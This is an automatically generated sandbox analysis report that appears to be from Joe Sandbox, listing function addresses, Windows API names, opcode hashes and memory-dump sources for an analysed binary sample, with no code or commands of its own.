                                                  • API String ID: 1746051919-0
                                                  • Opcode ID: 0d2cfb920ea231b6e9d51c7db040a15a52ec3b00ba863ec475c32ede1f66f479
                                                  • Instruction ID: 1717e3cbca1d23a9c188cf17084ccb542bc20c2f4f717e07ba1793a61e0fae4f
                                                  • Opcode Fuzzy Hash: 0d2cfb920ea231b6e9d51c7db040a15a52ec3b00ba863ec475c32ede1f66f479
                                                  • Instruction Fuzzy Hash: 3231F222A28B8182EA10AF55F86636E7360EB84BD5F504275EBDC87BD6DF3CE0418704
                                                  Function 00007FF6CA9D2AD0 Relevance: 3.1, APIs: 2, Instructions: 76timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: File$BuffersFlushTime
                                                  • String ID:
                                                  • API String ID: 1392018926-0
                                                  • Opcode ID: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                                  • Instruction ID: d5560d8a3bcc1ebb5bf65dbaebdeae3cf97bd7aae5d9f6ba29b81371359505aa
                                                  • Opcode Fuzzy Hash: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                                  • Instruction Fuzzy Hash: 2921E232E1DB5255EA628F51F5263BA6790AF02796F1440B1DECCC7292EE7CD8C6C301
                                                  Function 00007FF6CA9DAAE0 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: LoadString
                                                  • String ID:
                                                  • API String ID: 2948472770-0
                                                  • Opcode ID: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                                                  • Instruction ID: 268c71837820719d72fc8b488cd9485594b1fb5dbaebf73d93d1f308290a73af
                                                  • Opcode Fuzzy Hash: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                                                  • Instruction Fuzzy Hash: F1119370F186018AEA008F57B855124BBA1BB94FC1F944675CE8DE3B21DF7CE9A2C744
                                                  Function 00007FF6CA9D2BB0 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastPointer
                                                  • String ID:
                                                  • API String ID: 2976181284-0
                                                  • Opcode ID: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                                                  • Instruction ID: 5153aeeefe7c9ce123adff435e5f0c5a8c1e1d10e5bbc6541bf5cfc53be1806f
                                                  • Opcode Fuzzy Hash: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                                                  • Instruction Fuzzy Hash: FC119031E2864181EB608F25F8562697260EB45BA9F5443B1DAADC72D6CF3CE9D3C301
                                                  Function 00007FF6CA9C255C Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ItemRectTextWindow$Clientswprintf
                                                  • String ID:
                                                  • API String ID: 3322643685-0
                                                  • Opcode ID: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                  • Instruction ID: 9367f94b365032eff2db118c80b3acca469589c0ed3c5d888e5ad7fd91c9574b
                                                  • Opcode Fuzzy Hash: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                  • Instruction Fuzzy Hash: 7A019E24E2978A41FF597F92B17927A57916F85B4AF0800B0C8CEC729ADE2DE8D5C300
                                                  Function 00007FF6CA9DEB58 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6CA9DEBAD,?,?,?,?,00007FF6CA9D5752,?,?,?,00007FF6CA9D56DE), ref: 00007FF6CA9DEB5C
                                                  • GetProcessAffinityMask.KERNEL32 ref: 00007FF6CA9DEB6F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Process$AffinityCurrentMask
                                                  • String ID:
                                                  • API String ID: 1231390398-0
                                                  • Opcode ID: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                  • Instruction ID: 6b4af337ea5bff66a4d1455805ea7e9dd6002dfc5076fe28e5ae1d05b6c24341
                                                  • Opcode Fuzzy Hash: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                  • Instruction Fuzzy Hash: DEE02B61F2498646DF4C8F56D4654E973A2BFCCB40B848035D64BC3614DE2CE1458B00
                                                  Function 00007FF6CA9F21D0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                  • String ID:
                                                  • API String ID: 1173176844-0
                                                  • Opcode ID: ac554a43d54612151bc7e480101717375080be3004ee5b366f50feb51e7139dd
                                                  • Instruction ID: f68b51ef108bddd1f80f8cc36f7f9385979cf2c4ed104020110e11078566c1ef
                                                  • Opcode Fuzzy Hash: ac554a43d54612151bc7e480101717375080be3004ee5b366f50feb51e7139dd
                                                  • Instruction Fuzzy Hash: 7FE0B640F3A10B45FD286A653C772B401504F19376E5817B8FABEC86C3AE1CB4928215
                                                  Function 00007FF6CA9FD90C Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 485612231-0
                                                  • Opcode ID: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                                                  • Instruction ID: 85ad777313d3884ba7d9e9e2ee831f11f1183cfa7f90fa62302d8b081cc93300
                                                  • Opcode Fuzzy Hash: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                                                  • Instruction Fuzzy Hash: FFE0E650E1954346FF186FF2BC6A17823915F99B57F0440B8D98EC7263EE2C94D68605
                                                  Function 00007FF6CA9C33E4 Relevance: 1.8, APIs: 1, Instructions: 328COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 3668304517-0
                                                  • Opcode ID: 146c8be7864e05a93319b1445c6ce5b0f5f13eefb6d30d702ccf9d44bcf9f5cd
                                                  • Instruction ID: a4e7798e0c1fd46d0214e35b9e36f6cb18c921dbbcbb9367b8538af8817c9542
                                                  • Opcode Fuzzy Hash: 146c8be7864e05a93319b1445c6ce5b0f5f13eefb6d30d702ccf9d44bcf9f5cd
                                                  • Instruction Fuzzy Hash: ABD1FD76B18AC151EF289F25A6652BAB7A0FB05B89F040075CB9DC77A2CF3CE5618300
                                                  Function 00007FF6CA9D5294 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 1017591355-0
                                                  • Opcode ID: fe83b5f940341ca116520553916a602459c71814f9bb651f89fc5e1609d61f08
                                                  • Instruction ID: e8f1dd7e2eb2573c29e31c424577eb147dadb80dfb78d9b28b2cca82eb385c57
                                                  • Opcode Fuzzy Hash: fe83b5f940341ca116520553916a602459c71814f9bb651f89fc5e1609d61f08
                                                  • Instruction Fuzzy Hash: 7461F211E3C64781FA649E29B83727A9691AF44BD6F1440B5EECDC6AC7EE6CE4C1C301
                                                  Function 00007FF6CA9E1870 Relevance: 1.7, APIs: 1, Instructions: 172COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF6CA9DE948: ReleaseSemaphore.KERNEL32 ref: 00007FF6CA9DE974
                                                    • Part of subcall function 00007FF6CA9DE948: CloseHandle.KERNELBASE ref: 00007FF6CA9DE993
                                                    • Part of subcall function 00007FF6CA9DE948: DeleteCriticalSection.KERNEL32 ref: 00007FF6CA9DE9AA
                                                    • Part of subcall function 00007FF6CA9DE948: CloseHandle.KERNEL32 ref: 00007FF6CA9DE9B7
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CA9E1ACB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$CriticalDeleteReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 904680172-0
                                                  • Opcode ID: 7505b5341520eded39e51a109fac183586022765dd0b74e91cbb46e86dd1eeb5
                                                  • Instruction ID: afa1a5b087fe5c895b99e3098b0f9b76f5b6fa6c91fe0f1302e0192820d6a92b
                                                  • Opcode Fuzzy Hash: 7505b5341520eded39e51a109fac183586022765dd0b74e91cbb46e86dd1eeb5
                                                  • Instruction Fuzzy Hash: 4761D362B2668591EE08CF65E5650BC7364FF40B81F244176E7ADC7AC3CF28E4B18340
                                                  Function 00007FF6CA9CEC9C Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 3668304517-0
                                                  • Opcode ID: 6fcc6ad9d4eef2deb0c0af2341c07fa7cac1e653e2fea785f42f352cfc034175
                                                  • Instruction ID: ca02ed8dd893f3b2efcf108fca0b65053f061a4259cd3e440200a6d656fc2cbe
                                                  • Opcode Fuzzy Hash: 6fcc6ad9d4eef2deb0c0af2341c07fa7cac1e653e2fea785f42f352cfc034175
                                                  • Instruction Fuzzy Hash: 9F51B662A28A4140EA14AF55F4663AD6761FB45BCAF540176EECEC7397CF3DE485C300
                                                  Function 00007FF6CA9CE7A8 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF6CA9D3EC8: FindClose.KERNELBASE(?,?,00000000,00007FF6CA9E0811), ref: 00007FF6CA9D3EFD
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CA9CE993
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 1011579015-0
                                                  • Opcode ID: 01fc3a34611ceffdc41415965cd615ee03a8df2eb66c7c19820eeaa0a49a7534
                                                  • Instruction ID: 91639d5ff33e0cff1f2fcadef4a018fd43a6eedd69c8cd5bee628cd8edd5a906
                                                  • Opcode Fuzzy Hash: 01fc3a34611ceffdc41415965cd615ee03a8df2eb66c7c19820eeaa0a49a7534
                                                  • Instruction Fuzzy Hash: 01516422A28A8581FA609F25F46637D3361FF85BC9F540176EACEC76A6CF2CD541C310
                                                  Function 00007FF6CA9D1794 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 3668304517-0
                                                  • Opcode ID: a6c2d1d11c9c3fa61e1c4eec1e32b0a762409bb3f30d9d3d80aa0462dd41b130
                                                  • Instruction ID: 78a981cee09595dff8a136cbc4cf873992158b81dfb5942d50e3a6f83900c2e9
                                                  • Opcode Fuzzy Hash: a6c2d1d11c9c3fa61e1c4eec1e32b0a762409bb3f30d9d3d80aa0462dd41b130
                                                  • Instruction Fuzzy Hash: EC41E462F28A8142EA14DE17BA1537AA261FB84BC1F548435EE8CDBF5BDF3CD4918300
                                                  Function 00007FF6CA9D2F58 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 3668304517-0
                                                  • Opcode ID: 628d8687d64302939e4d23947fbdc881fe9b8ad1275f709a097da27502e78629
                                                  • Instruction ID: 964f842bdac09deb4f81a5b36d24056f24d52ba684ddd55f39f92140a624cd07
                                                  • Opcode Fuzzy Hash: 628d8687d64302939e4d23947fbdc881fe9b8ad1275f709a097da27502e78629
                                                  • Instruction Fuzzy Hash: D941F262E28B0181EE109F29F56637A2361EB84BDAF140175EA8DC76DADF3CE481C600
                                                  Function 00007FF6CA9C129C Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                                  • String ID:
                                                  • API String ID: 680105476-0
                                                  • Opcode ID: 3234b2b5ac3a40deddea539940c0fe254cec77c5e42e079e7c739459eb3fc390
                                                  • Instruction ID: d263f7078f4ad7bf972e7b1ef3118098a997de2119999e314ee57c80b586c2d6
                                                  • Opcode Fuzzy Hash: 3234b2b5ac3a40deddea539940c0fe254cec77c5e42e079e7c739459eb3fc390
                                                  • Instruction Fuzzy Hash: 5D21A132A18B5185EA14AE51B4122796260EB04BF9F780B71DEBDC7BC2DF7CE0518348
                                                  Function 00007FF6CA9C2C54 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 3668304517-0
